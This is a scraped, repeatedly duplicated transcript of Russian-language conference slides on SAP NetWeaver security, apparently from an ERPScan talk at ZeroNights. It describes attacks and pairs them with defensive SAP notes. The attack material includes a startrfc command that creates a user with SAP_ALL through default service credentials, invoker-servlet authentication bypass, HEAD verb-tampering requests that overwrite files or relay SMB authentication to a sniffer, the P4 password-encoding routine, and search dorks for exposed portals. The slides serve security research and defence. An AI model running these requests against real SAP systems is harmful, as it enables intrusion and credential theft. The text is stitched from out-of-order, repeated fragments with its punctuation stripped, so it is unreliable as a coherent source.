erpscancom 41ERPScan mdash invest in security to secure investments
Host is not alive
Port closed
HTTP port
SAP port
Раскрытие информации DSECRG-00231
erpscancom 42ERPScan mdash invest in security to secure investments
Защита
erpscancom 43ERPScan mdash invest in security to secure investments
bull SAP notes154854815458831503856948851 1545883
bull Удаление ненужных и не поддерживаемых приложений
Межсайтовый скриптинг
erpscancom 44ERPScan mdash invest in security to secure investments
15092011 [DSECRG-11-033] SAP Crystal Report Server pubDBLogon - Linked ХSS vulnerability
19082011 [DSECRG-11-030] SAP NetWeaver JavaMailExamples - XSS
19072011 [DSECRG-11-028] SAP NetWeaver ISpeak ndash XSS
20062011 [DSECRG-11-024 ] SAP NetWeaver performance Provier Root - XSS20062011 [DSECRG-11-025 ] SAP NetWeaver Trust Center Service - XSS12042011 [DSECRG-11-016] SAP NetWeaver Data Archiving Service - multiple XSS12042011 [DSECRG-11-015] SAP NetWeaver MessagingServer - XSS14032011 [DSECRG-11-013] SAP NetWeaver Runtime - multiple XSS14032011 [DSECRG-11-012] SAP NetWeaver Integration Directory - multiple XSS14032011 [DSECRG-11-011] SAP Crystal Reports 2008 - Multiple XSS14032011 [DSECRG-11-010] SAP NetWeaver logonhtml - XSS14032011 [DSECRG-11-009] SAP NetWeaver XI SOAP Adapter - XSS
14122010 [DSECRG-09-067] SAP NetWeaver DTR - Multiple XSS14122010 [DSECRG-10-009] SAP NetWeaver ExchangeProfile - XSS14122010 [DSECRG-10-008] SAP NetWaver JPR Proxy Server - Multiple XSS14122010 [DSECRG-10-007] SAP NetWeaver Component Build Service - XSS11112010 [DSECRG-09-056] SAP Netweaver SQL Monitors - Multiple XSS
И это только те что закрыты
SMBRelay
erpscancom 45ERPScan mdash invest in security to secure investments
httpserverportmmrMMRfilename=smbsnifferanyfile
CSRF + SmbRelay = CSSR
erpscancom 46ERPScan mdash invest in security to secure investments
httpserverportmmrMMRfilename=smbsnifferanyfile
Заставь нажать на эту ссылку того у кого есть к ней доступ
Защита от CSRF
erpscancom 47ERPScan mdash invest in security to secure investments
Встроенное API для защиты от CSRF
bull Standard XSRF Protection Вся работа реализуется сервером приложений (простые GETPOST)
bull Custom CSRF Protection Обработка CSRF токенов на разработчике
Есть множество мест где эта защита не реализована
SPML
erpscancom 48ERPScan mdash invest in security to secure investments
Аутентификация
erpscancom 49ERPScan mdash invest in security to secure investments
Web Dynpro - programmatic Portal iViews - programmatic J2EE Web apps - declarative или programmatic
Programmatic Используя UME
Declarative Используя WEBXML
Декларативная аутентификация
erpscancom 50ERPScan mdash invest in security to secure investments
ltservletgt ltservlet-namegtCriticalActionltservlet-namegt ltservlet-classgtcomsapadminCriticalActionltservlet-classgt ltservletgtltservlet-mappinggt ltservlet-namegtCriticalActionltltservlet-namegt lturl-patterngtadmincriticallturl-patterngt ltservlet-mappinggtltsecurity-constraintgtltweb-resource-collectiongtltweb-resource-namegtRestrictedaccessltweb-resource-namegtlturl-patterngtadminlturl-patterngtlthttp-methodgtGETlthttp-methodgtltweb-resource-collectiongtltauth-constraintgt ltrole-namegtadminltrole-namegt ltauth-constraintgtltsecurity-constraintgt
Обход аутентификации Invoker Servlet
erpscancom 51ERPScan mdash invest in security to secure investments
bull Можно вызвать любой сервлет напрямую по имени классаbull Пример вызова - servletcomsapadminCriticalAction
bull Порядка 30 приложений из 150 уязвимо (SAP ECC 6)
Защита
erpscancom 52ERPScan mdash invest in security to secure investments
bull Параметр ldquoEnableInvokerServletGloballyrdquo установить в ldquofalserdquo bull Для включения опции только для конкретных приложений - note 1445998bull Для SAP NetWeaver Portal ndash note 1467771bull Для поиска потенциальных уязвимостей в собственных приложениях - ERPScan webxml scanner manually
Массовый взлом
bull
erpscancom 53ERPScan mdash invest in security to secure investments
I have a dream helliphellip
Уязвимость Verb Tampering
erpscancom 54ERPScan mdash invest in security to secure investments
А что если попробовать HEAD вместо GET
ltsecurity-constraintgtltweb-resource-collectiongtltweb-resource-namegtRestrictedaccessltweb-resource-namegtlturl-patterngtadminlturl-patterngtlthttp-methodgtGETlthttp-methodgtltweb-resource-collectiongt ltauth-constraintgt ltrole-namegtadminltrole-namegt ltauth-constraintgtltsecurity-constraintgt
Отказ в обслуживании
Приложение Integration Directory
HEAD dirsupportCheckServicecmd_checkampfileNameL=DEFAULT1PFLamp directoryNameL=DusrsapDM0SYSprofile HTTP10
erpscancom 55ERPScan mdash invest in security to secure investments
Любой злоумышленник может с помощью одного запроса перезаписать любой файл на системе удалённо из сети
интернет
Получение доступа к ОС
Приложение Integration Directory
HEAD dirsupportCheckServicecmd_checkampfileNameL=DEFAULT1PFLamp directoryNameL= smbsniffersniff HTTP10
erpscancom 56ERPScan mdash invest in security to secure investments
Любой злоумышленник может с помощью одного запроса получить административный доступ к SAP серверу под
управлением Windows
Полный контроль
bull Обнаружили секретный интерфейс для управления JAVA движкомndash Удалённое администрирование пользователейndash Доступ к ОСndash Выполнение произвольных командndash Выключение сервера
bull Установлен по умолчаниюbull Уязвим к Verb Tamperingbull Атака возможна без аутентификации из Интернет
erpscancom 57ERPScan mdash invest in security to secure investments
Взломать SAP за 60 секунд
ДЕМООООООООООООО
erpscancom 58ERPScan mdash invest in security to secure investments
Победа
erpscancom 59ERPScan mdash invest in security to secure investments
Защита
erpscancom 60ERPScan mdash invest in security to secure investments
bull SAP note 1503579 1616259bull ERPScan WEBXML check toolbull Отключение ненужных сервисов
Итоги
Проблема ответственности и контроля
erpscancom 61ERPScan mdash invest in security to secure investments
Будущая работа
Конференцииbull 11 October - HITB в Кула-Лумпуре (Малайзия)bull 25 October - HackerHalted в Miami (США)bull 25 November ndash ZeroNights в Санкт-Петербурге (Россия)
Новостиbull dsecrgru bull erpscanru
Cпасибоbull Дмитрий Частухин Дмитрий Евдокимов Алексей Cинцов Алексей Тюрин Павел
Кузьмин Антон Спирин bull Организаторам Risspa
Опросbull Тренинг по безопасности SAP
erpscancom 62ERPScan mdash invest in security to secure investments
ZeroNights mdash международная конференция посвященная техническим аспектам информационной безопасности На конференции выступят известные эксперты отрасли из России Европы США Индии Сингапура и других стран Главная цель конференции mdash распространение информации о новых методах атак угроз и защиты от них а кроме того создание площадки для общения специалистов-практиков по ИБ
- Взломать SAP за 60 cекунд Александр Поляков Технический Дирек
- я
- Доклады о безопасности SAP
- Количество SAP notes за год
- Публичная информация об уязвимостях
- SAP не дремлет
- Поговорим о безопасности
- Что мы знаем о SAP
- SAP Who cares
- Постоянные новые угрозы
- Как атакуют
- Последний год
- Угрозы для бизнеса
- Как защищаемся
- Что происходит сейчас
- Slide 16
- 1001 Способ обойти SOD
- Не диалоговые пользователи
- Атаки на Gateway и Message Server
- Хитрые настройки
- Прямой доступ к таблицам
- Доступ из интернет + уязвимости
- Атаки на ICM (ABAP)
- Прочие небезопасные сервисы
- Атаки на J2EE Engine
- J2EE Platform Architecture
- Удалённый доступ
- Уязвимый алгоритм шифрования паролей в P4
- Уязвимый алгоритм шифрования паролей в P4 (2)
- Уязвимый алгоритм шифрования паролей в P4 (3)
- Уязвимый алгоритм шифрования паролей в P4 (4)
- Защита
- Взлом из интернет
- Из чего состоит J2EE Engine
- Из чего состоит J2EE Engine (2)
- Из чего состоит J2EE Engine (3)
- Из чего состоит J2EE Engine (4)
- Раскрытие информации
- Раскрытие информации DSECRG-11-023
- Раскрытие информации DSECRG-11-027
- Раскрытие информации DSECRG-11-032
- Раскрытие информации DSECRG-00231
- Защита (2)
- Межсайтовый скриптинг
- SMBRelay
- CSRF + SmbRelay = CSSR
- Защита от CSRF
- SPML
- Аутентификация
- Декларативная аутентификация
- Обход аутентификации Invoker Servlet
- Защита (3)
- Массовый взлом
- Уязвимость Verb Tampering
- Отказ в обслуживании
- Получение доступа к ОС
- Полный контроль
- Взломать SAP за 60 секунд
- Победа
- Защита (4)
- Итоги
- Будущая работа
- Slide 63
-
Как проконтролировать безопасность столь сложной системы
erpscanru 16ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
1001 Способ обойти SOD
bull Не диалоговые пользователиbull Прямой доступ к таблицамbull Безопасность сервисов типа Gateway и Massage Server и прочих bull Хитрые настройки bull Доступ из интернет bull Уязвимости
erpscanru 17ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
Не диалоговые пользователи
Есть множество RFC функций для создания пользователя
Пример1 SUSR_RFC_USER_INTERFACEstartrfc -3 -h 17216063 -s 01 -c 001 -u SAPCPIC -p admin ndashF SUSR_RFC_USER_INTERFACE -E USER=TEST -E ACTIVITY=01 -E PASSWORD=123 -E USER_TYPE=A -T USER_PROFILES12r=SAP_ALL
Пример2 BAPI_USER_CREATE1erpscanru 18ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
Миф Пользователи SAPCPIC и TMSADM не диалоговые и не имеют доступ к бизнес-информации
Атаки на Gateway и Message Server
bull Атаки описаны в руководстве по безопасности SAP
bull Позволяют ndash неавторизированно зарегистрировать ложный сервер приложений
ndash вызвать зарегистрированный RFC сервис типа SAPXPG
ndash зарегистрировать свой RFC сервис
bull Есть настройки позволяющие
элементарно закрыть уязвимости
erpscanru 19ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
Если это так просто и очевидно почему в 90 аудитов настроено не безопасно
Хитрые настройки
Администратор выставил следующие настройки
loginmin_password_uppercase = 2
loginmin_password_lng = 8
loginmin_password_specials = 2
loginpassword_compliance_to_current_policy = 0
loginpassword_max_idle_productive =90
loginpassword_max_idle_initial = 90
В чём проблема
erpscanru 20ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
Прямой доступ к таблицам
bull Чтение таблиц
ndash через транзакции SE16 SM31 SM30 SA38 SE38
ndash через RFC вызовы RFC_READ_TABLE
bull Критичные таблицы
USR02 mdash хеши паролей
SSF_PSE_D mdash ключи для SSO доступа
RFCDES ndash пароли в открытом и зашифрованном виде
ICFSERVLOC - пароли для ICF сервисов в открытом виде
и ещё немного пока под секретом
erpscanru 21ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
Доступ из интернет + уязвимости
erpscancom 22ERPScan mdash invest in security to secure investments
Атаки на ICM (ABAP)
Более 1500 сервисов с критичным функционалом
1) По умолчанию разрешён доступ любым пользователем
2) Для доступа к sapbcsoaprfc не проверяется авторизация S_RFC
3) Используя пароли по умолчанию типа TMSADMPASSWORD
erpscanru 23ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
Как итог - полный контроль системы злоумышленником
Прочие небезопасные сервисы
bull sappublicinfo mdash информация о системе анонимноbull sappublicicf_infoicr_groups mdash информация о приложенияхbull sapbcsoaprfc mdash выполнение RFC команд удаленно DOSbull sapbcsrtxipsap mdash выполнение критичных действийbull sapbwBex mdash просмотр критичных
инфообъектовbull sapbcbspsaphtmlb_samples mdash тестовый сервисbull sapbcguisapitswebgui mdash SAPGUI через WEB
erpscanru 24ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
Нами изучено более 50 небезопасных сервисов
Атаки на J2EE Engine
NetWeaver J2EE = интеграция управление взаимодействие
bull SAP Portal bull SAP PIbull SAP XIbull SAP Mobile Infrastructurebull SAP Solution Manager
erpscancom 25ERPScan mdash invest in security to secure investments
J2EE Platform Architecture
erpscancom 26ERPScan mdash invest in security to secure investments
Удалённый доступ
erpscancom 27ERPScan mdash invest in security to secure investments
Service Name Port Number Default Value Range (min-max)HTTP 5NN00 50000 50000-59900
HTTP over SSL 5NN01 50001 50001-59901
IIOP 5NN07 50007 50007-59907
IIOP Initial Context 5NN02 50002 50002-59902
IIOP over SSL 5NN03 50003 50003-59903
P4 5NN04 50004 50004-59904
P4 over HTTP 5NN05 50005 50005-59905
P4 over SSL 5NN06 50006 50006-59906
Telnet 5NN08 50008 50008-59908
LogViewer control 5NN09 50009 50009-59909
JMS 5NN10 50010 50010-59910
По умолчанию шифрование на всех портах отключено
Уязвимый алгоритм шифрования паролей в P4
erpscancom 28ERPScan mdash invest in security to secure investments
bull P4 - протокол используемый утилитой Visual Adminbull Все данные передаются в открытом видеbull К сожалению (счастью) пароль закодирован
Как он закодирован
Уязвимый алгоритм шифрования паролей в P4
erpscancom 29ERPScan mdash invest in security to secure investments
Уязвимый алгоритм шифрования паролей в P4
erpscancom 30ERPScan mdash invest in security to secure investments
Удиви меня
Уязвимый алгоритм шифрования паролей в P4
erpscancom 31ERPScan mdash invest in security to secure investments
87 char mask = 43690 88 char check = 21845 89 char[] result = new char[datalength + 1] 91 for (int i = 0 i lt datalength ++i) 92 mask = (char)(mask ^ data[i]) 93 result[i] = mask 95 result[datalength] = (char)(mask ^ check) 97 return result
Защита
erpscancom 32ERPScan mdash invest in security to secure investments
bull Используйте SSL для шифрования всех соединений между SAP системамиhttphelpsapcomsaphelp_nwpi71helpdatade14ef2940cbf2195de10000000a1550b0contenthtm
Взлом из интернет
erpscancom 33ERPScan mdash invest in security to secure investments
SAP системы доступны только из внутренней сети о да в самом деле
inurlirjportal inurlIciEventService sapinurlIciEventServiceIciEventConfinurlwsnavigatorjspstestjspinurlirjgokmdocs
Из чего состоит J2EE Engine
erpscancom 34ERPScan mdash invest in security to secure investments
SAP NetWeaver 64
300 web ndashприложений
Из чего состоит J2EE Engine
erpscancom 35ERPScan mdash invest in security to secure investments
SAP NetWeaver 70
500 web ndashприложений
Из чего состоит J2EE Engine
erpscancom 36ERPScan mdash invest in security to secure investments
SAP NetWeaver 71
800 web ndashприложений
Из чего состоит J2EE Engine
erpscancom 37ERPScan mdash invest in security to secure investments
SAP NetWeaver 72
1200 web ndashприложений и это только в TRIAL
Раскрытие информации
erpscancom 38ERPScan mdash invest in security to secure investments
bull Версия системыDSECRG-11-023DSECRG-11-027 DSECRG-00208
bull Логи и трейсыDSECRG-00191DSECRG-00232
bull Имена пользователейDSECRG-11-034
bull Сканирование внутренней сети через внешний уязвимый сервер
DSECRG-11-032 DSECRG-00175
New
New
Раскрытие информации DSECRG-11-023
erpscancom 39ERPScan mdash invest in security to secure investments
Раскрытие информации DSECRG-11-027
erpscancom 40ERPScan mdash invest in security to secure investments
Раскрытие информации DSECRG-11-032
erpscancom 41ERPScan mdash invest in security to secure investments
Host is not alive
Port closed
HTTP port
SAP port
Раскрытие информации DSECRG-00231
erpscancom 42ERPScan mdash invest in security to secure investments
Защита
erpscancom 43ERPScan mdash invest in security to secure investments
bull SAP notes154854815458831503856948851 1545883
bull Удаление ненужных и не поддерживаемых приложений
Межсайтовый скриптинг
erpscancom 44ERPScan mdash invest in security to secure investments
15092011 [DSECRG-11-033] SAP Crystal Report Server pubDBLogon - Linked ХSS vulnerability
19082011 [DSECRG-11-030] SAP NetWeaver JavaMailExamples - XSS
19072011 [DSECRG-11-028] SAP NetWeaver ISpeak ndash XSS
20062011 [DSECRG-11-024 ] SAP NetWeaver performance Provier Root - XSS20062011 [DSECRG-11-025 ] SAP NetWeaver Trust Center Service - XSS12042011 [DSECRG-11-016] SAP NetWeaver Data Archiving Service - multiple XSS12042011 [DSECRG-11-015] SAP NetWeaver MessagingServer - XSS14032011 [DSECRG-11-013] SAP NetWeaver Runtime - multiple XSS14032011 [DSECRG-11-012] SAP NetWeaver Integration Directory - multiple XSS14032011 [DSECRG-11-011] SAP Crystal Reports 2008 - Multiple XSS14032011 [DSECRG-11-010] SAP NetWeaver logonhtml - XSS14032011 [DSECRG-11-009] SAP NetWeaver XI SOAP Adapter - XSS
14122010 [DSECRG-09-067] SAP NetWeaver DTR - Multiple XSS14122010 [DSECRG-10-009] SAP NetWeaver ExchangeProfile - XSS14122010 [DSECRG-10-008] SAP NetWaver JPR Proxy Server - Multiple XSS14122010 [DSECRG-10-007] SAP NetWeaver Component Build Service - XSS11112010 [DSECRG-09-056] SAP Netweaver SQL Monitors - Multiple XSS
И это только те что закрыты
SMBRelay
erpscancom 45ERPScan mdash invest in security to secure investments
httpserverportmmrMMRfilename=smbsnifferanyfile
CSRF + SmbRelay = CSSR
erpscancom 46ERPScan mdash invest in security to secure investments
httpserverportmmrMMRfilename=smbsnifferanyfile
Заставь нажать на эту ссылку того у кого есть к ней доступ
Защита от CSRF
erpscancom 47ERPScan mdash invest in security to secure investments
Встроенное API для защиты от CSRF
bull Standard XSRF Protection Вся работа реализуется сервером приложений (простые GETPOST)
bull Custom CSRF Protection Обработка CSRF токенов на разработчике
Есть множество мест где эта защита не реализована
SPML
erpscancom 48ERPScan mdash invest in security to secure investments
Аутентификация
erpscancom 49ERPScan mdash invest in security to secure investments
Web Dynpro - programmatic Portal iViews - programmatic J2EE Web apps - declarative или programmatic
Programmatic Используя UME
Declarative Используя WEBXML
Декларативная аутентификация
erpscancom 50ERPScan mdash invest in security to secure investments
ltservletgt ltservlet-namegtCriticalActionltservlet-namegt ltservlet-classgtcomsapadminCriticalActionltservlet-classgt ltservletgtltservlet-mappinggt ltservlet-namegtCriticalActionltltservlet-namegt lturl-patterngtadmincriticallturl-patterngt ltservlet-mappinggtltsecurity-constraintgtltweb-resource-collectiongtltweb-resource-namegtRestrictedaccessltweb-resource-namegtlturl-patterngtadminlturl-patterngtlthttp-methodgtGETlthttp-methodgtltweb-resource-collectiongtltauth-constraintgt ltrole-namegtadminltrole-namegt ltauth-constraintgtltsecurity-constraintgt
Обход аутентификации Invoker Servlet
erpscancom 51ERPScan mdash invest in security to secure investments
bull Можно вызвать любой сервлет напрямую по имени классаbull Пример вызова - servletcomsapadminCriticalAction
bull Порядка 30 приложений из 150 уязвимо (SAP ECC 6)
Защита
erpscancom 52ERPScan mdash invest in security to secure investments
bull Параметр ldquoEnableInvokerServletGloballyrdquo установить в ldquofalserdquo bull Для включения опции только для конкретных приложений - note 1445998bull Для SAP NetWeaver Portal ndash note 1467771bull Для поиска потенциальных уязвимостей в собственных приложениях - ERPScan webxml scanner manually
Массовый взлом
bull
erpscancom 53ERPScan mdash invest in security to secure investments
I have a dream helliphellip
Уязвимость Verb Tampering
erpscancom 54ERPScan mdash invest in security to secure investments
А что если попробовать HEAD вместо GET
ltsecurity-constraintgtltweb-resource-collectiongtltweb-resource-namegtRestrictedaccessltweb-resource-namegtlturl-patterngtadminlturl-patterngtlthttp-methodgtGETlthttp-methodgtltweb-resource-collectiongt ltauth-constraintgt ltrole-namegtadminltrole-namegt ltauth-constraintgtltsecurity-constraintgt
Отказ в обслуживании
Приложение Integration Directory
HEAD dirsupportCheckServicecmd_checkampfileNameL=DEFAULT1PFLamp directoryNameL=DusrsapDM0SYSprofile HTTP10
erpscancom 55ERPScan mdash invest in security to secure investments
Любой злоумышленник может с помощью одного запроса перезаписать любой файл на системе удалённо из сети
интернет
Получение доступа к ОС
Приложение Integration Directory
HEAD dirsupportCheckServicecmd_checkampfileNameL=DEFAULT1PFLamp directoryNameL= smbsniffersniff HTTP10
erpscancom 56ERPScan mdash invest in security to secure investments
Любой злоумышленник может с помощью одного запроса получить административный доступ к SAP серверу под
управлением Windows
Полный контроль
bull Обнаружили секретный интерфейс для управления JAVA движкомndash Удалённое администрирование пользователейndash Доступ к ОСndash Выполнение произвольных командndash Выключение сервера
bull Установлен по умолчаниюbull Уязвим к Verb Tamperingbull Атака возможна без аутентификации из Интернет
erpscancom 57ERPScan mdash invest in security to secure investments
Взломать SAP за 60 секунд
ДЕМООООООООООООО
erpscancom 58ERPScan mdash invest in security to secure investments
Победа
erpscancom 59ERPScan mdash invest in security to secure investments
Защита
erpscancom 60ERPScan mdash invest in security to secure investments
bull SAP note 1503579 1616259bull ERPScan WEBXML check toolbull Отключение ненужных сервисов
Итоги
Проблема ответственности и контроля
erpscancom 61ERPScan mdash invest in security to secure investments
Будущая работа
Конференцииbull 11 October - HITB в Кула-Лумпуре (Малайзия)bull 25 October - HackerHalted в Miami (США)bull 25 November ndash ZeroNights в Санкт-Петербурге (Россия)
Новостиbull dsecrgru bull erpscanru
Cпасибоbull Дмитрий Частухин Дмитрий Евдокимов Алексей Cинцов Алексей Тюрин Павел
Кузьмин Антон Спирин bull Организаторам Risspa
Опросbull Тренинг по безопасности SAP
erpscancom 62ERPScan mdash invest in security to secure investments
ZeroNights mdash международная конференция посвященная техническим аспектам информационной безопасности На конференции выступят известные эксперты отрасли из России Европы США Индии Сингапура и других стран Главная цель конференции mdash распространение информации о новых методах атак угроз и защиты от них а кроме того создание площадки для общения специалистов-практиков по ИБ
- Взломать SAP за 60 cекунд Александр Поляков Технический Дирек
- я
- Доклады о безопасности SAP
- Количество SAP notes за год
- Публичная информация об уязвимостях
- SAP не дремлет
- Поговорим о безопасности
- Что мы знаем о SAP
- SAP Who cares
- Постоянные новые угрозы
- Как атакуют
- Последний год
- Угрозы для бизнеса
- Как защищаемся
- Что происходит сейчас
- Slide 16
- 1001 Способ обойти SOD
- Не диалоговые пользователи
- Атаки на Gateway и Message Server
- Хитрые настройки
- Прямой доступ к таблицам
- Доступ из интернет + уязвимости
- Атаки на ICM (ABAP)
- Прочие небезопасные сервисы
- Атаки на J2EE Engine
- J2EE Platform Architecture
- Удалённый доступ
- Уязвимый алгоритм шифрования паролей в P4
- Уязвимый алгоритм шифрования паролей в P4 (2)
- Уязвимый алгоритм шифрования паролей в P4 (3)
- Уязвимый алгоритм шифрования паролей в P4 (4)
- Защита
- Взлом из интернет
- Из чего состоит J2EE Engine
- Из чего состоит J2EE Engine (2)
- Из чего состоит J2EE Engine (3)
- Из чего состоит J2EE Engine (4)
- Раскрытие информации
- Раскрытие информации DSECRG-11-023
- Раскрытие информации DSECRG-11-027
- Раскрытие информации DSECRG-11-032
- Раскрытие информации DSECRG-00231
- Защита (2)
- Межсайтовый скриптинг
- SMBRelay
- CSRF + SmbRelay = CSSR
- Защита от CSRF
- SPML
- Аутентификация
- Декларативная аутентификация
- Обход аутентификации Invoker Servlet
- Защита (3)
- Массовый взлом
- Уязвимость Verb Tampering
- Отказ в обслуживании
- Получение доступа к ОС
- Полный контроль
- Взломать SAP за 60 секунд
- Победа
- Защита (4)
- Итоги
- Будущая работа
- Slide 63
-
1001 Способ обойти SOD
bull Не диалоговые пользователиbull Прямой доступ к таблицамbull Безопасность сервисов типа Gateway и Massage Server и прочих bull Хитрые настройки bull Доступ из интернет bull Уязвимости
erpscanru 17ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
Не диалоговые пользователи
Есть множество RFC функций для создания пользователя
Пример1 SUSR_RFC_USER_INTERFACEstartrfc -3 -h 17216063 -s 01 -c 001 -u SAPCPIC -p admin ndashF SUSR_RFC_USER_INTERFACE -E USER=TEST -E ACTIVITY=01 -E PASSWORD=123 -E USER_TYPE=A -T USER_PROFILES12r=SAP_ALL
Пример2 BAPI_USER_CREATE1erpscanru 18ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
Миф Пользователи SAPCPIC и TMSADM не диалоговые и не имеют доступ к бизнес-информации
Атаки на Gateway и Message Server
bull Атаки описаны в руководстве по безопасности SAP
bull Позволяют ndash неавторизированно зарегистрировать ложный сервер приложений
ndash вызвать зарегистрированный RFC сервис типа SAPXPG
ndash зарегистрировать свой RFC сервис
bull Есть настройки позволяющие
элементарно закрыть уязвимости
erpscanru 19ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
Если это так просто и очевидно почему в 90 аудитов настроено не безопасно
Хитрые настройки
Администратор выставил следующие настройки
loginmin_password_uppercase = 2
loginmin_password_lng = 8
loginmin_password_specials = 2
loginpassword_compliance_to_current_policy = 0
loginpassword_max_idle_productive =90
loginpassword_max_idle_initial = 90
В чём проблема
erpscanru 20ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
Прямой доступ к таблицам
bull Чтение таблиц
ndash через транзакции SE16 SM31 SM30 SA38 SE38
ndash через RFC вызовы RFC_READ_TABLE
bull Критичные таблицы
USR02 mdash хеши паролей
SSF_PSE_D mdash ключи для SSO доступа
RFCDES ndash пароли в открытом и зашифрованном виде
ICFSERVLOC - пароли для ICF сервисов в открытом виде
и ещё немного пока под секретом
erpscanru 21ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
Доступ из интернет + уязвимости
erpscancom 22ERPScan mdash invest in security to secure investments
Атаки на ICM (ABAP)
Более 1500 сервисов с критичным функционалом
1) По умолчанию разрешён доступ любым пользователем
2) Для доступа к sapbcsoaprfc не проверяется авторизация S_RFC
3) Используя пароли по умолчанию типа TMSADMPASSWORD
erpscanru 23ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
Как итог - полный контроль системы злоумышленником
Прочие небезопасные сервисы
bull sappublicinfo mdash информация о системе анонимноbull sappublicicf_infoicr_groups mdash информация о приложенияхbull sapbcsoaprfc mdash выполнение RFC команд удаленно DOSbull sapbcsrtxipsap mdash выполнение критичных действийbull sapbwBex mdash просмотр критичных
инфообъектовbull sapbcbspsaphtmlb_samples mdash тестовый сервисbull sapbcguisapitswebgui mdash SAPGUI через WEB
erpscanru 24ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
Нами изучено более 50 небезопасных сервисов
Атаки на J2EE Engine
NetWeaver J2EE = интеграция управление взаимодействие
bull SAP Portal bull SAP PIbull SAP XIbull SAP Mobile Infrastructurebull SAP Solution Manager
erpscancom 25ERPScan mdash invest in security to secure investments
J2EE Platform Architecture
erpscancom 26ERPScan mdash invest in security to secure investments
Удалённый доступ
erpscancom 27ERPScan mdash invest in security to secure investments
Service Name Port Number Default Value Range (min-max)HTTP 5NN00 50000 50000-59900
HTTP over SSL 5NN01 50001 50001-59901
IIOP 5NN07 50007 50007-59907
IIOP Initial Context 5NN02 50002 50002-59902
IIOP over SSL 5NN03 50003 50003-59903
P4 5NN04 50004 50004-59904
P4 over HTTP 5NN05 50005 50005-59905
P4 over SSL 5NN06 50006 50006-59906
Telnet 5NN08 50008 50008-59908
LogViewer control 5NN09 50009 50009-59909
JMS 5NN10 50010 50010-59910
По умолчанию шифрование на всех портах отключено
Уязвимый алгоритм шифрования паролей в P4
erpscancom 28ERPScan mdash invest in security to secure investments
bull P4 - протокол используемый утилитой Visual Adminbull Все данные передаются в открытом видеbull К сожалению (счастью) пароль закодирован
Как он закодирован
Уязвимый алгоритм шифрования паролей в P4
erpscancom 29ERPScan mdash invest in security to secure investments
Уязвимый алгоритм шифрования паролей в P4
erpscancom 30ERPScan mdash invest in security to secure investments
Удиви меня
Уязвимый алгоритм шифрования паролей в P4
erpscancom 31ERPScan mdash invest in security to secure investments
87 char mask = 43690 88 char check = 21845 89 char[] result = new char[datalength + 1] 91 for (int i = 0 i lt datalength ++i) 92 mask = (char)(mask ^ data[i]) 93 result[i] = mask 95 result[datalength] = (char)(mask ^ check) 97 return result
Защита
erpscancom 32ERPScan mdash invest in security to secure investments
bull Используйте SSL для шифрования всех соединений между SAP системамиhttphelpsapcomsaphelp_nwpi71helpdatade14ef2940cbf2195de10000000a1550b0contenthtm
Взлом из интернет
erpscancom 33ERPScan mdash invest in security to secure investments
SAP системы доступны только из внутренней сети о да в самом деле
inurlirjportal inurlIciEventService sapinurlIciEventServiceIciEventConfinurlwsnavigatorjspstestjspinurlirjgokmdocs
Из чего состоит J2EE Engine
erpscancom 34ERPScan mdash invest in security to secure investments
SAP NetWeaver 64
300 web ndashприложений
Из чего состоит J2EE Engine
erpscancom 35ERPScan mdash invest in security to secure investments
SAP NetWeaver 70
500 web ndashприложений
Из чего состоит J2EE Engine
erpscancom 36ERPScan mdash invest in security to secure investments
SAP NetWeaver 71
800 web ndashприложений
Из чего состоит J2EE Engine
erpscancom 37ERPScan mdash invest in security to secure investments
SAP NetWeaver 72
1200 web ndashприложений и это только в TRIAL
Раскрытие информации
erpscancom 38ERPScan mdash invest in security to secure investments
bull Версия системыDSECRG-11-023DSECRG-11-027 DSECRG-00208
bull Логи и трейсыDSECRG-00191DSECRG-00232
bull Имена пользователейDSECRG-11-034
bull Сканирование внутренней сети через внешний уязвимый сервер
DSECRG-11-032 DSECRG-00175
New
New
Раскрытие информации DSECRG-11-023
erpscancom 39ERPScan mdash invest in security to secure investments
Раскрытие информации DSECRG-11-027
erpscancom 40ERPScan mdash invest in security to secure investments
Раскрытие информации DSECRG-11-032
erpscancom 41ERPScan mdash invest in security to secure investments
Host is not alive
Port closed
HTTP port
SAP port
Раскрытие информации DSECRG-00231
erpscancom 42ERPScan mdash invest in security to secure investments
Защита
erpscancom 43ERPScan mdash invest in security to secure investments
bull SAP notes154854815458831503856948851 1545883
bull Удаление ненужных и не поддерживаемых приложений
Межсайтовый скриптинг
erpscancom 44ERPScan mdash invest in security to secure investments
15092011 [DSECRG-11-033] SAP Crystal Report Server pubDBLogon - Linked ХSS vulnerability
19082011 [DSECRG-11-030] SAP NetWeaver JavaMailExamples - XSS
19072011 [DSECRG-11-028] SAP NetWeaver ISpeak ndash XSS
20062011 [DSECRG-11-024 ] SAP NetWeaver performance Provier Root - XSS20062011 [DSECRG-11-025 ] SAP NetWeaver Trust Center Service - XSS12042011 [DSECRG-11-016] SAP NetWeaver Data Archiving Service - multiple XSS12042011 [DSECRG-11-015] SAP NetWeaver MessagingServer - XSS14032011 [DSECRG-11-013] SAP NetWeaver Runtime - multiple XSS14032011 [DSECRG-11-012] SAP NetWeaver Integration Directory - multiple XSS14032011 [DSECRG-11-011] SAP Crystal Reports 2008 - Multiple XSS14032011 [DSECRG-11-010] SAP NetWeaver logonhtml - XSS14032011 [DSECRG-11-009] SAP NetWeaver XI SOAP Adapter - XSS
14122010 [DSECRG-09-067] SAP NetWeaver DTR - Multiple XSS14122010 [DSECRG-10-009] SAP NetWeaver ExchangeProfile - XSS14122010 [DSECRG-10-008] SAP NetWaver JPR Proxy Server - Multiple XSS14122010 [DSECRG-10-007] SAP NetWeaver Component Build Service - XSS11112010 [DSECRG-09-056] SAP Netweaver SQL Monitors - Multiple XSS
И это только те что закрыты
SMBRelay
erpscancom 45ERPScan mdash invest in security to secure investments
httpserverportmmrMMRfilename=smbsnifferanyfile
